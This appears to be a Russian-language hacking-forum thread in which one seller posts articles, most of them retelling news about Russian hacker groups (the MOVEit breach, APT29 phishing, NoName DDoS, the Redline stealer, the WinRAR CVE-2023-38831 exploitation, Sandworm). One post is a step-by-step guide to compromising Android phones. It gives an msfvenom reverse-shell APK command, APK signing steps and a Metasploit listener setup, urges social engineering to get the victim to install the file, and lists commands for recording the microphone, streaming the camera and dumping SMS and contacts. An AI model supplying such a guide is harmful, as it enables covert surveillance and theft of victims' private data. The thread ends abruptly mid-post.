Статьи и мануалы / подкасты от BlackMast

BlackMAST
Оффлайн

BlackMAST

Проверенный продавец
.
Регистрация
09.12.19
Сообщения
260
Реакции
36
Репутация
0
Русские хакеры вымогают деньги у правительства США


9d15555a4884c09dbf7bf6755c445ba6.jpg



По данным одного из ведущих агентств США по кибербезопасности, несколько федеральных правительственных учреждений США пострадали в результате глобальной кибератаки со стороны российских хакеров, использующих уязвимость в широко используемом программном обеспечении.
Сегодня подробно разберем, как произошла кибератака, и кто за ней стоит.
Что произошло

Агентство США по кибербезопасности и безопасности инфраструктуры «оказывает поддержку нескольким федеральным агентствам, которые столкнулись со вторжениями, затрагивающими их приложения MOVEit», — заявил Эрик Гольдштейн, исполнительный помощник директора агентства по кибербезопасности, в заявлении для CNN, имея в виду ПО, через которое произошел взлом. «Мы работаем в срочном порядке, чтобы понять последствия и обеспечить своевременное устранение».
Clop, банда вымогателей, предположительно ответственная за это, как известно, обычно требует многомиллионных выкупов. Но никаких требований о выкупе от федеральных агентств не поступало, сообщил высокопоставленный чиновник журналистам на брифинге.
Ответ CISA пришел после того, как Progress Software, американская фирма, производящая программное обеспечение, используемое хакерами, заявила, что обнаружила вторую уязвимость в коде, над исправлением которой компания работала. Министерство энергетики входит в число нескольких федеральных агентств, взломанных в ходе продолжающейся глобальной хакерской кампании, подтвердил CNN представитель министерства.



5db9540e5ab507ad1676636deeb2c937.png

Последствия взлома

Взломы не оказали «значительного воздействия» на федеральные гражданские агентства, заявила журналистам директор CISA Джен Истерли, добавив, что хакеры «в значительной степени просто авантюристы» в использовании уязвимости в программном обеспечении для взлома сетей.
Эта новость дополняет растущее число жертв широкомасштабной хакерской кампании, которая началась два месяца назад и затронула крупные университеты США и правительства штатов. Хакерское веселье усиливает давление на федеральных чиновников, которые пообещали положить конец угрозе атак программ-вымогателей, которые нанесли ущерб школам, больницам и местным органам власти по всей территории США.
Университет Джона Хопкинса в Балтиморе и известная система здравоохранения университета заявили, что в результате взлома могла быть украдена «конфиденциальная личная и финансовая информация», включая записи о медицинских счетах.
Подробности кибератаки

Хакеры использовали брешь в широко используемом программном обеспечении, известном как MOVEit, которое компании и агентства используют для передачи данных. Progress Software, американская фирма, производящая программное обеспечение, сообщила CNN, что в программном обеспечении была обнаружена новая уязвимость, «которая может быть использована злоумышленником».
«Мы связались с клиентами и сообщили о шагах, которые им необходимо предпринять для дальнейшей защиты своих сред, и мы также отключили MOVEit Cloud, поскольку мы срочно работаем над устранением проблемы», — говорится в заявлении компании.



b0299d2c79a24c002288631d317655b0.png

Особенность взлома


Российские хакеры первыми воспользовались уязвимостью MOVEit, но эксперты говорят, что другие группировки теперь тоже могут иметь доступ к программному коду, необходимому для проведения атак.
Группа вымогателей дала жертвам время, чтобы связаться с ними по поводу выплаты выкупа. Хакеры также уточнили: «Если вы представитель государственной, городской или полицейской службы, не волнуйтесь, мы стерли все ваши данные. Вам не нужно связываться с нами. Мы не заинтересованы в раскрытии такой информации».
Кто взял на себя ответственность

Группа вымогателей CLOP — одна из многочисленных банд в Восточной Европе и России, которые почти исключительно сосредоточены на том, чтобы выманить у своих жертв как можно больше денег.
«Активность, которую мы наблюдаем в настоящее время, — добавление названий компаний на их сайт утечки — это тактика, чтобы напугать жертв, как зарегистрированных, так и не внесенных в список, чтобы они заплатили», — сказал CNN Рэйф Пиллинг, директор по исследованию угроз в Secureworks, принадлежащей Dell.



69a635c6bba5dc513e9cbd257e435678.png
 
BlackMAST
Оффлайн

BlackMAST

Проверенный продавец
.
Регистрация
09.12.19
Сообщения
260
Реакции
36
Репутация
0
455f951f1c5349826e95b43f488f1b14.jpg




Украинская служба контрразведки заявила, что российские хакеры изо всех сил пытаются придумать способ вывести из строя спутники Илона Маска.
Что произошло

Украинские военные используют технологию Starlink для связи на поле боя, и она стала целью российской разведывательной службы, которая пытается загрузить на спутники вредоносное ПО.
Над Украиной пролетают несколько тысяч спутников, и член высшего отдела безопасности, занимающийся этим вопросом, сказал, что их не слишком беспокоят попытки России отключить некоторые из них.


87488f6065b0585e61a5641b72a9b149.png



Ответ властей

Илья Витюк, начальник управления кибербезопасности СБУ, ответил: «Мы видели, что были попытки проникновения в эти системы. Наш враг чрезвычайно сосредоточен на получении информации о Starlink. Они планировали эти операции давно, и некоторые хакерские группы переместились ближе к линии фронта. Это было очень интересное вредоносное ПО... оно дало им возможность получить конфигурации Starlink, так что, в конце концов, они смогли понять местоположение».
Маск не прокомментировал новости о том, что Россия пытается взломать ее технологии.



997617a2afcb7fd9f90b6ea120e713f0.png



Последствия атаки

Пока нет достоверной информации о масштабах взлома, и добились ли хакеры своей цели. На сегодняшний день ни одна из российских группировок не взяла на себя ответственность за взломы. Сообщается, что несмотря на то, что хакерам удалось вычислить местоположение нескольких спутник, это всё равно не нанесло серьезного ущерба.



97f591b764476747937a1331291ae971.png
 
BlackMAST
Оффлайн

BlackMAST

Проверенный продавец
.
Регистрация
09.12.19
Сообщения
260
Реакции
36
Репутация
0
Российские хакеры используют приложение Zulip Chat в дипломатических фишинговых атаках


40607406b4ea7c07227b2f558a94e152.jpg




Продолжающаяся кампания, нацеленная на министерства иностранных дел стран, входящих в НАТО, указывает на причастность к этому российских хакеров.
Особенности атаки

В фишинговых атаках используются PDF-документы с дипломатическими приманками, некоторые из которых замаскированы под сообщения из Германии, для доставки варианта вредоносного ПО под названием Duke, которое было приписано APT29 (он же BlueBravo, Cloaked Ursa, Cozy Bear, Iron Hemlock, Midnight Blizzard и The Dukes).



4f4a618c0a165d6f35675ba5c78f5406.png


«Злоумышленник использовал Zulip — чат-приложение с открытым исходным кодом — для управления и контроля, чтобы уклоняться от своих действий и скрывать их за законным веб-трафиком», — заявила голландская компания по кибербезопасности EclecticIQ в анализе, проведенном на прошлой неделе.
Последовательность заражения следующая: вложение в формате PDF под названием «Прощание с послом Германии» содержит код JavaScript, который инициирует многоэтапный процесс, чтобы оставить постоянный бэкдор в скомпрометированных сетях.
Были ли подобные атаки ранее

Об использовании APT29 тем приглашений ранее сообщал Lab52, который задокументировал атаку, которая выдавала себя за норвежское посольство для доставки полезной нагрузки DLL, способной связаться с удаленным сервером для получения дополнительных полезных данных.
Использование домена «bahamas.gov[.]bs» в обоих наборах вторжений еще больше укрепляет эту связь. Выводы также подтверждают предыдущее исследование Anheng Threat Intelligence Center, опубликованное в прошлом месяце.
Если потенциальная цель поддается фишинговой ловушке, открыв файл PDF, запускается вредоносная дроппер HTML под названием Invitation_Farewell_DE_EMB для выполнения JavaScript, который сбрасывает файл ZIP-архива, который, в свою очередь, упаковывается в файл HTML-приложения (HTA), предназначенный для развертывания. вредоносное ПО Duke.
Командование и управление (C2) облегчается за счет использования Zulip API для отправки сведений о жертве в чат-комнату, контролируемую действующим лицом (toyy.zulipchat[.]com), а также для удаленного захвата скомпрометированных хостов.



f8121aa31e449f38c5e01e13ffe1302b.png

Масштаб атаки

EclecticIQ заявила, что обнаружила второй PDF-файл, который, вероятно, использовался APT29 для разведки или тестирования.

«Он не содержал полезной нагрузки, но уведомлял хакера, если жертва открывала вложение электронной почты, получая уведомление через скомпрометированный домен edenparkweddings[.]com», — заявили исследователи.

Стоит отметить, что злоупотребление Zulip является нормой для спонсируемой государством группы, которая имеет опыт использования широкого спектра законных интернет-сервисов, таких как Google Drive, Microsoft OneDrive, Dropbox, Notion, Firebase и Trello. для С2.

Основными целями APT29 являются правительства и государственные деятели, политические организации, исследовательские фирмы и критически важные отрасли в США и Европе. Но, что интересно, неизвестный противник использует свою тактику для взлома китайскоязычных пользователей с помощью Cobalt Strike.

Это произошло после того, как Группа реагирования на компьютерные чрезвычайные ситуации Украины (CERT-UA) предупредила о новой серии фишинговых атак против государственных организаций Украины с использованием набора инструментов постэксплуатации с открытым исходным кодом на основе Go под названием Merlin. Активность отслеживается под псевдонимом UAC-0154.



847a97c0274eb1e6cd05e06d6c8d357f.png
 
BlackMAST
Оффлайн

BlackMAST

Проверенный продавец
.
Регистрация
09.12.19
Сообщения
260
Реакции
36
Репутация
0
Трояны в рекламе: новый ход российских хакеров

fee494a47ec13f3a17b95d2305ac49ed.jpg


Майкл Сикорски, технический директор и вице-президент по разработке Unit 42 компании Palo Alto Networks, рассказал об изобретательности русских хакеров. В этой статье подробнее узнаем о необычном способе взлома. Кстати, эту кибератаку мы уже освещали .


80006248cbb1c14f3e1b46b19f497a00.png

В чем суть атаки

По словам Сикорского, этот метод предполагает использование, казалось бы, безобидной рекламы в качестве средства распространения вредоносного ПО. Российские хакеры перехватили рекламу польского дипломата, который пытался продать свой автомобиль BMW на фоне конфликта с Украиной. Хакеры перепрофилировали рекламу, встроив в нее вредоносное ПО. Эта тактика, по словам Сикорского, подчеркивает российскую стратегию по созданию тайных крючков в иностранных системах.

14032e1c3a8f0967db4e29a563615c0e.png


Компрометируя посольства и дипломатические миссии, злоумышленники могут заложить основу для более изощренных атак, потенциально влияющих на политические решения. Что отличает этот инцидент, так это новаторское использование подлинного документа в качестве носителя вредоносного ПО.

Насколько опасна новая тактика

«Те же хакеры, которые отвечали за SolarWinds — мы отслеживали их как Cloaked Ursa — получила этот документ и разослала его по посольствам по всей Украине», — сказал он. «А когда Россия заполучила его (объявление о продаже BMW), они даже снизили цену, внедрили в него вредоносное ПО и начали его отправлять снова и снова. Это показывает, что у русских хакеров есть доступ к украинским сетям».

97bb4a04ae651eac106cd7f9004fbbf2.png

Специалист отметил, что кибератаки русских хакеров становятся все более изощренные и неочевидные. Это первый зафиксированный случай, когда исходный документ был использован как носитель вредоносного ПО. Сикорски добавил, что такой способ взлома может стать реальной проблемой, ведь от него невозможно защититься.
 
BlackMAST
Оффлайн

BlackMAST

Проверенный продавец
.
Регистрация
09.12.19
Сообщения
260
Реакции
36
Репутация
0
Хакеры NoName наносят удар

a87d8b96ff384d9a66731806a27e22d5.jpg



Неделю назад мы уже обсуждали хакерскую группировку NoName, прочитать можно . В этом подкасте узнаем подробнее о NoName.
С чего всё началось

Было отмечено, что в первой половине 2023 года группировка NoName057(16) была одной из самых активных на политической арене.
В последние месяцы методы группы усовершенствовались, согласно эксклюзивному интервью Cybernews о NoName, в котором в этом месяце участвовали два исследователя угроз Radware в Black Hat.
Чем сейчас занимаются хакеры

Согласно последнему сообщению Radware, группа вербует сторонников своего бот-проекта DDoSia из даркнета. Затем новобранцы получают выплаты в криптовалюте в зависимости от того, в скольких целевых кампаниях они участвуют и насколько успешными являются атаки.
Исследователи также обнаружили, что NoName изменила тактику и начала целенаправленно атаковать критически важную инфраструктуру, такую как финансовый, государственный и авиационный секторы, чтобы оптимизировать воздействие своих DDoS-атак.



718a3c32ddff03608255ed125449ef39.png
Недавняя кибератака

В июле NoName057(16) взяли на себя ответственность за атаки на банковские системы Украины и Италии, французский парламент и почти дюжину атак на финансовый и авиационный сектор Швейцарии.



6a3f33b45a4ce6ca5c042b1dafce0640.png
Их DDoS-атака переполнила сервера тысячами запросов трафика от случайных компьютеров-ботов, что привело к повсеместному сбою веб-сайтов.



0bb7d133fb366f1ac022aa6adf97c160.png
Между тем, атака на польские железные дороги привела к аварийной остановке около двадцати поездов после того, как двое польских граждан подделали сигнальную систему поездов, используя радиочастоту. СМИ связывают эту атаку с пророссийскими хакерскими группировками.



0fbc3408273a117f98cdcd3e6f37aa17.png
 
BlackMAST
Оффлайн

BlackMAST

Проверенный продавец
.
Регистрация
09.12.19
Сообщения
260
Реакции
36
Репутация
0
Русские и турецкие кибермошенники объединились

dd9257bd6841509dd5949d18f376a0df.jpg


Киберпреступники в Турции объединились с недавно прибывшими российскими хакерами-эмигрантами, чтобы наводнить некогда умирающий онлайн-рынок десятками миллионов недавно украденных личных учетных данных. Специалисты уже назвали это развитием транснационального характера мошенничества. В этой статье узнаем об этом подробнее.
Что произошло

Тысячи мужчин, многие из которых получили образование инженеров-программистов, бежали из России в Турцию в сентябре прошлого года.
Некоторые из них, по словам турецкой полиции и исследователей безопасности, обратились к относительно низкоуровневому онлайн-мошенничеству, объединяясь с авторитетными турецкими коллегами, чтобы избежать обнаружения, отмывать свои доходы и продавать учетные данные, полученные с компьютеров по всему миру.


de7815638a81e245b7903c7ba9afcf0b.png

Расследование мошенничества

Недавний всплеск активности побудил турецкую полицию провести расследование.
Специалисты заявили, что преступники, базирующиеся в русскоязычных странах, как правило, действуют относительно открыто, поскольку меры со стороны их правительств были слабыми.
Полицейские сообщили, что хакеры в основном создают фишинговые ссылки и воруют личную информацию жертв, объединяясь вместе с турецкими онлайн-преступниками.
Куда утекает информация

Излюбленная торговая площадка киберпреступников в последние месяцы была наводнена десятками миллионов украденных кредитных карт, паролей и учетных данных.
Эта находка, обнаруженная специалистом по информационной безопасности Ошером Ассором из Auren Cyber Israel, использует сложный код, который отправляет только что украденные учетные данные большому количеству клиентов, которые подписываются на потоки данных в группах Telegram.
Данные собираются с помощью обычного вредоносного ПО, которое, похоже, обходит большинство известных антивирусных программ. Ассор считает, что вредоносное ПО под названием Redline случайно загружается людьми, использующими нелегальные веб-сайты для игры в видеоигры или пиратские версии популярного программного обеспечения.


bb8f1962fb667675654eeb70400bf598.png

Что именно крадут мошенники

Но особую ценность данных, собираемых Redline, делает тот факт, что они также крадут файлы cookie или небольшие фрагменты личного кода, которые находятся в браузерах людей, позволяя хакерам выдавать себя за жертву в Интернете и даже копировать кредитные карты, которые люди сохраняют в своих аккаунтах.
«Такие данные более ценны, потому что они свежие», — сказал Ассор. «Кража паролей не является чем-то новым, но уникальным здесь является то, что информация поступает «свежей» — каждое обновление содержит пакет с сотнями и тысячами журналов, украденных за последние несколько часов, что сохраняет файлы cookie «горячими».
На скриншотах разговоров с турецким хакером, которыми Ассор поделился с Financial Times, видно, что сотни групп Telegram предлагают доступ к свежесобранным данным, часто всего за 50 долларов. Каждый пакет содержит тысячи записей — на одном снимке экрана показано 76 миллионов различных точек данных, сопоставленных для удобства использования.
Мнение специалистов

Турецкий специалист по информационной безопасности, попросивший не называть его имени, поскольку контакты с хакерами в Турции подпадают под серую зону закона, заявил, что он проник в одну из этих групп Telegram, маскируясь под покупателя.
В течение нескольких месяцев он наблюдал, как вновь прибывшие российские хакеры обучали своих турецких коллег сложному коду для сопоставления огромных объемов собираемых данных, в то время как турецкие преступники использовали свои контакты в Западной Европе, особенно в Германии, для обеспечения более выгодных цен и более эффективной работы.
В других чатах он был свидетелем того, как группа праздновала массовые кражи, обсуждала способы конвертации украденной криптовалюты в турецкую лиру и даже разрабатывала способы покупки недвижимости для получения турецкого паспорта.


3efcd66c10ba8c7840f2bbd473f9925a.png

«Ни один из них не является крупным хакером, но они очень эффективны и научились очень хорошо автоматизировать процессы — их производительность быстро растет», — сказал он.
Взаимодействие Ассора с группой показывает то же самое — профессиональный маркетинг и даже индивидуальное руководство. В одном случае турецкий хакер даже дал ему совет о ресторане в Стамбуле.
Но когда хакера спросили о его связях с русскими, он возразил.
«Нет, братан», — ответил он. «Я не хочу знать — главное не знать [их] лица, а быть рядом с талантливыми людьми».
 
BlackMAST
Оффлайн

BlackMAST

Проверенный продавец
.
Регистрация
09.12.19
Сообщения
260
Реакции
36
Репутация
0
Взлом Android с помощью Metasploit и Msfvenom


b3e5e03f13b57f2b928e24554a1d59cb.jpg




Вы, наверное, ни раз слышали о самом известном хакерском инструменте под названием Metasploit. Все профессиональные хакеры в один голос скажут, что Metasploit — универсальный инструмент, который имеет множество модулей для взлома Android, IOS, а также Windows. А его работа с Msfvenom считается лучшей комбинацией для взлома устройств Android, что мы сегодня и проверим.


9a20e85a77c51cb01f2056a3f1bf195f.jpg
Metaspoilt и Msfvenom

Так почему же все так любят Metasploit? Metasploit, созданный Rapid7, имеет самую большую базу эксплойтов, шеллкодов и много разнообразной документации. А самое приятное, что все это абсолютно бесплатно. В народе его даже успели прозвать “хакерским швейцарским ножом”.
Msfvenom — бесплатный инструмент для создания полезной нагрузки (вредоносного файла). Это, так сказать, «брат» Metasploit. Стоит отметить, что теперь этот инструмент есть и в Kali Linux как отдельная опция, позволяющая максимально упростить работу.
Когда дело доходит до взлома телефонов Android, существует множество способов сделать это. Есть приложения, сайты, скрипты и многое другое. Мы уже ни раз демонстрировали вам различные методы взломов, ну а сегодня мы расскажем, как взломать телефон Android с помощью Metasploit и Msfvenom.
Как взломать Android
Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.
Для выполнения этого взлома с использованием Metasploit и Msfvenom вам понадобится ОС Kali Linux.
Итак, приступим к взлому.
Шаг 1. Создание вредоносного APK-файла
Откройте терминал Kali Linux и введите следующую команду:


0c87f5a5be3301c338297d495713d77a.jpg
# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.78.129 LPORT=4444 R > hacking.apk*LHOST= Ваш IP-адрес
*LPORT= 4444

*Используйте ifconfig, чтобы найти свой IP-адрес, если вы его не знаете.
# ifconfig
Шаг 2. Отправка APK-файла жертве

Вы создали вредоносный .apk-файл шпионского приложения с помощью Metasploit и Msfvenom. По умолчанию он будет сохранен в вашей папке /home/. Найдите свой недавно созданный файл hacking.apk и отправьте его жертве. Используйте навыки социальной инженерии, чтобы заставить жертву установить файл.
*Если у вас возникли какие-либо ошибки или проблемы с подписью, используйте следующее:
Keytool(предустановлен в Kali Linux)
keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
Jarsigner (предустановлен в Kali Linux)
Затем введите:
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore hacking.apk aliasname
После этого:
jarsigner -verify -verbose -certs hacking.apk
Шаг 3. Настройка Metasploit
Откройте новый терминал и используйте следующую команду, чтобы запустить платформу Metasploit.


75240edd71ff872fd844f80f64e0cd70.jpg

# msfconsole
Теперь в консоли платформы Metasploit введите следующее:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp

после этого настройте адрес прослушивающего хоста:
set LHOST 192.168.78.129
set LPORT 4444


exploit
*LHOST= Ваш IP-адрес
*LPORT= 4444
Шаг 4. Эксплуатация
Теперь, когда жертва откроет приложение на своем телефоне, вы получите полный доступ к устройству.
Вот некоторые команды, которые вы можете использовать:

  • record_mic — записывает звук с устройства Android и сохраняет его на локальном диске.
  • webcam_snap — позволяет делать снимки, взломав камеру Android устройства.
  • webcam_stream — транслирует онлайн видео со взломанной камеры Android.
  • dump_contacts — копирует все контакты с телефона жертвы.
  • dump_sms — взламывает сообщения жертвы и сохраняет их в текстовом файле в вашей системе.
  • geolocate — отслеживает взломанное устройство по местоположению.
Заключение

Хотя Metasploit и Msfvenom не так сложны в использовании, они требуют последовательных шагов, которые необходимо реализовать. Но благодаря нашему руководству любой начинающий хакер с лёгкостью осилит эти инструменты. Надеемся, что эта статья была для вас информативной и полезной. Удачи!
 
BlackMAST
Оффлайн

BlackMAST

Проверенный продавец
.
Регистрация
09.12.19
Сообщения
260
Реакции
36
Репутация
0
Пророссийские хакеры используют уязвимость WinRAR

cbf8ca731e93023eb66feeefe4144876.jpg


Вступить в наш чат​

Пророссийские хакерские группы воспользовались недавно обнаруженной уязвимостью безопасности в утилите архивирования WinRAR в рамках фишинговой кампании, направленной на сбор учетных данных из скомпрометированных систем. В этой статье разберем атаку подробнее.

da777ddf4c1e470b79addb2bd92234d2.png


Особенности атаки
«Атака включает в себя использование вредоносных архивных файлов, использующих недавно обнаруженную уязвимость, затрагивающую версии программного обеспечения для сжатия WinRAR до 6.23 и отслеживаемую как CVE-2023-38831», — говорится в отчете Cluster25, опубликованном на прошлой неделе.

Архив содержит заминированный PDF-файл, при нажатии на который включается пакетный сценарий Windows, который запускает команды PowerShell для открытия обратной оболочки, предоставляющей злоумышленнику удаленный доступ к целевому хосту.

Также развернут скрипт PowerShell, который крадет данные, включая учетные данные для входа, из браузеров Google Chrome и Microsoft Edge. Захваченная информация передается через сайт веб-перехватчика.

Откуда появилась уязвимость
CVE-2023-38831 относится к серьезной уязвимости в WinRAR, которая позволяет злоумышленникам выполнить произвольный код при попытке просмотреть безопасный файл в ZIP-архиве. Выводы Group-IB в августе 2023 года показали, что с апреля 2023 года эта ошибка использовалась как оружие нулевого дня в атаках, нацеленных на трейдеров.

Это событие произошло после того, как компания Mandiant, принадлежащая Google, составила график «быстро развивающихся» фишинговых операций российского государственного субъекта APT29, нацеленных на дипломатические учреждения, на фоне резкого роста темпов и акцента на Украине в первой половине 2023 года.

Существенные изменения в инструментах и методах работы APT29 «вероятно, предназначены для поддержки увеличения частоты и объема операций и затруднения судебно-медицинского анализа», заявила компания, и что она «одновременно использовала различные цепочки заражения в разных операциях».


3d19af2c268e0717aa214a2a34173e88.png


Были ли еще подобные атаки
В июле 2023 года Группа реагирования на компьютерные чрезвычайные ситуации Украины (CERT-UA) обвинила Turla в атаках с использованием вредоносного ПО Capibar и бэкдора Kazuar для шпионских атак на украинские оборонительные объекты.

«Группа Turla — стойкий противник с долгой историей деятельности. Их происхождение, тактика и цели указывают на хорошо финансируемую операцию с высококвалифицированными оперативниками», — сообщила Trend Micro в недавнем отчете. «Turla на протяжении многих лет постоянно развивала свои инструменты и методы и, вероятно, продолжит их совершенствовать».

6ee2cc97304ca4a203d031e0ce1316db.png
 
BlackMAST
Оффлайн

BlackMAST

Проверенный продавец
.
Регистрация
09.12.19
Сообщения
260
Реакции
36
Репутация
0
Русские хакеры атаковали украинских операторов связи


1b762b1151e5645efb8d4a9a4481eda7.jpg



Вступить в наш чат​
Согласно недавнему отчету органов кибербезопасности, с мая российская хакерская группа, известная как Sandworm, атаковала по меньшей мере одиннадцать украинских интернет- и телекоммуникационных провайдеров. Сегодня узнаем больше об этих атаках.

a39307ddba24aaab54487e643dbc4d81.png

Особенности атаки
Атаки привели к перебоям в обслуживании и потенциальной утечке данных, сообщила украинская группа реагирования на компьютерные чрезвычайные ситуации CERT-UA.

Sandworm использовал различные вредоносные программы, в том числе Poemgate и Poseidon, для кражи учетных данных и управления зараженными устройствами, а также Whitecat для стирания любых следов.

Кроме того, хакеры использовали скомпрометированные учетные записи VPN, не защищенные многофакторной аутентификацией, для проникновения в сети жертв.

9f4e7cc8529b5296e253dc53ed9cae40.png


Последствия взлома
Злоумышленники похитили документы, схемы, контракты и пароли из официальных аккаунтов жертв в социальных сетях, чтобы сделать эту информацию общедоступной или использовать ее для продвижения своих атак.

По данным CERT-UA, на заключительном этапе атаки они вывели из строя активное сетевое и серверное оборудование, а также системы хранения данных.

0a40d019d79cae4f1504c4b679c4ded3.png
 
BlackMAST
Оффлайн

BlackMAST

Проверенный продавец
.
Регистрация
09.12.19
Сообщения
260
Реакции
36
Репутация
0
Мурат Уртембаев — история первого советского хакера

0ad0838912b4415c7ce0af7f64b30355.jpg


Вступить в наш чат​
В этой статье продолжаем знакомиться с самыми известными русскими хакерами. Первым советским хакером был выпускник МГУ Мурат Уртембаев. В 1983 г. он хакнул систему ПО АвтоВАЗ, в результате чего работа конвейера остановилась на три дня. И это одна из первых «кибер-атак» в СССР, которую обнаружили.

7038e6fe022cd56a319a35d06fa59e7b.png

Как стал хакером
Когда в 1983 году молодой выпускник МГУ и работник автозавода ВАЗ оказался в тяжелом финансовом положении, он обратился за помощью к своим работодателям. Руководство завода отговорило Мурата Уртембаева искать другую работу и пообещало ему повышение по службе и повышение зарплаты.

Однако со временем Уртембаев понял, что руководство его обмануло. Затем он разработал план мести. Он тайно изменял программу, используемую для работы сборочной линии, и заражал ее вредоносной ошибкой. Затем он вмешался и устранил проблему, получив должное признание со стороны руководства завода, которое, как он считал, уже давно назрело.

Схема атаки
По плану Мурата, «вирус» должен был запуститься в определенный час. И чтобы обезопасить себя, программист позаботился об алиби — он назначил старт патча на день своего выхода из отпуска. По расчету Уртембаева должен был выйти на работу, обнаружить сбой и устранить его, героически спасая конвейер. Но план провалился, так как программа самостоятельно запустилась раньше на несколько дней…

01e39cca05064d6160c6313da77bf327.png

Последствия взлома
В результате вмешательства Уртембаева завод был парализован на три дня. Поскольку это не входило в намерения Уртембаева – он лишь планировал вызвать проблему, чтобы немедленно ее устранить – он обратился к руководству с повинной.

Советский уголовный кодекс не предусматривал, что делать с киберпреступлениями, поэтому Уртембаев был признан виновным в хулиганстве и получил условный срок, а также крупный штраф. Он также стал первым пойманным советским хакером.

Произошедшая история стала известной на весь Союз и вызвала множество споров на счет поступка Уртенбаева. В газетах писали, что системный программист Волжского автозавода модифицировал ПО АСУ ТП главного конвейера, в результате чего работа была остановлена на трое суток. Двести автомобилей не сошло с конвейера ВАЗа, пока программисты искали источник сбоев. Ущерб исчислялся миллионами рублей.

219d4c72389c552a8a1c240f3c7d93d0.png
 
BlackMAST
Оффлайн

BlackMAST

Проверенный продавец
.
Регистрация
09.12.19
Сообщения
260
Реакции
36
Репутация
0
Российские хакеры используют функцию Ngrok и эксплойт WinRAR для атак на посольства


89ec1bdd2fd9fb477c34ecfde1b93d7c.jpg


Вступить в наш чат​
После Sandworm и APT28 (известного как Fancy Bear), другая российская хакерская группа, APT29, использует уязвимость CVE-2023-38831 в WinRAR для кибератак. Сегодня узнаем подробнее об этой атаке.

Кто ответственен за взлом
APT29 отслеживается под разными именами (UNC3524,/NobleBaron/Dark Halo/NOBELIUM/Cozy Bear/CozyDuke, SolarStorm) и нацелен на посольства с помощью приманки для продажи автомобилей BMW.

Уязвимость безопасности CVE-2023-38831 затрагивает версии WinRAR до 6.23 и позволяет создавать архивы .RAR и .ZIP, которые могут выполняться в фоновом коде, подготовленном злоумышленником для вредоносных целей.

Уязвимость использовалась как нулевой день с апреля злоумышленниками, нацеленными на форумы по торговле криптовалютами и акциями.

Статический домен Ngrok
В отчете, опубликованном на этой неделе, Совет национальной безопасности и обороны Украины (NDSC) сообщает, что APT29 использует вредоносный ZIP-архив, который в фоновом режиме запускает сценарий для показа PDF-приманки и загрузки кода PowerShell, который загружает и выполняет полезную нагрузку.

Вредоносный архив называется «DIPLOMATIC-CAR-FOR-SALE-BMW.pdf» и нацелен на несколько стран европейского континента, включая Азербайджан, Грецию, Румынию и Италию.

b53bf3598a8728cc99ecde49c9a16b37.png


APT29 уже использовал фишинговую приманку с рекламой автомобилей BMW для нападения на дипломатов в Украине во время майской кампании по доставке полезных данных ISO с помощью техники контрабанды HTML.

Украинский NDSC утверждает, что в этих атаках APT29 объединил старую тактику фишинга с новой техникой, обеспечивающей связь с вредоносным сервером.

NDSC сообщает, что российские хакеры использовали бесплатный статический домен Ngrok (новая функция, о которой Ngrok объявила 16 августа) для доступа к серверу управления и контроля (C2), размещенному на их экземпляре Ngrok.

Используя этот метод, злоумышленникам удалось скрыть свою активность и связаться со скомпрометированными системами, не подвергаясь риску быть обнаруженными.

Поскольку исследователи из компании Group-IB, занимающейся кибербезопасностью, сообщили, что уязвимость CVE-2023-38831 в WinRAR использовалась как нулевой день, продвинутые злоумышленники начали включать ее в свои атаки.

Исследователи безопасности из ESET обнаружили в августе атаки, приписываемые российской хакерской группе APT28, которая использовала уязвимость в целевой фишинговой кампании, нацеленной на политические субъекты в ЕС и Украине, используя повестку дня Европейского парламента в качестве приманки.

2aee3a49616fca85bf279624d63e8efa.png



В октябрьском отчете Google отмечается, что проблема безопасности была использована российскими и китайскими государственными хакерами для кражи учетных данных и других конфиденциальных данных, а также для обеспечения устойчивости целевых систем.

Украинский NDSC заявляет, что наблюдаемая кампания APT29 выделяется тем, что она сочетает в себе старые и новые методы, такие как использование уязвимости WinRAR для доставки полезных данных и сервисов Ngrok для сокрытия связи с C2.

В отчете украинского агентства представлен набор индикаторов компрометации (IoC), состоящий из имен файлов и соответствующих хешей для сценариев PowerShell и файла электронной почты, а также доменов и адресов электронной почты.
 
BlackMAST
Оффлайн

BlackMAST

Проверенный продавец
.
Регистрация
09.12.19
Сообщения
260
Реакции
36
Репутация
0
Как российские хакеры атаковали американские ядерные лаборатории

30d820285d80b4bd80ccb7aa73ceaec4.jpg


Вступить в наш чат​
Прошлым летом российская хакерская группа, известная как Cold River, атаковала три ядерные исследовательские лаборатории в Соединенных Штатах. Вспомним, как это было.

Что произошло
В период с августа по сентябрь хакерская команда «Cold River» нацелилась на Брукхейвенскую (BNL), Аргоннскую (ANL) и Ливерморскую национальные лаборатории имени Лоуренса (LLNL), согласно данным Интернета, которые показали, что хакеры создают поддельные страницы входа для каждого учреждения и отправляют электронные письма ученым-ядерщикам, пытаясь заставить их раскрыть свои пароли.


56074d2171631632af8ca574d0519fb1.png



Кто стоит за взломом
Хакеры Cold River, впервые появившаяся в поле зрения профессионалов разведки после нападения на министерство иностранных дел Великобритании в 2016 году, в последние годы, согласно интервью с девятью фирмами, занимающимися кибербезопасностью, была замешана в десятках других громких хакерских инцидентов.

«Это одна из самых важных хакерских групп, о которых вы никогда не слышали», — сказал Адам Мейерс, старший вице-президент по разведке американской компании по кибербезопасности CrowdStrike.

Были ли еще атаки
В мае Cold River взломала и опубликовала электронные письма, принадлежащие бывшему главе британской шпионской службы МИ-6. Это была лишь одна из нескольких операций по «взлому и утечке» в прошлом году, проведенных связанными с Россией хакерами, в ходе которых конфиденциальные сообщения были обнародованы в Великобритании, Польше и Латвии.

По данным французской компании по кибербезопасности Sekoia.io, в ходе другой недавней шпионской операции, Cold River зарегистрировала доменные имена, призванные имитировать как минимум три европейские неправительственные организации, расследующие военные преступления.

17bdd3a142c625a404c5f7229354d719.png
 
BlackMAST
Оффлайн

BlackMAST

Проверенный продавец
.
Регистрация
09.12.19
Сообщения
260
Реакции
36
Репутация
0
Русские хакеры представляют «высокий» уровень угрозы для ЕС


d066d6eb1d7389ec3eff1433bdda96c0.jpg



Вступить в наш чат

Группа реагирования на чрезвычайные ситуации в киберпространстве Европейского Союза предупредила общественность, что российская хакерская группировка Fancy Bear нацелена на европейские правительства. В этой статье узнаем об инциденте подробнее.

Что произошло
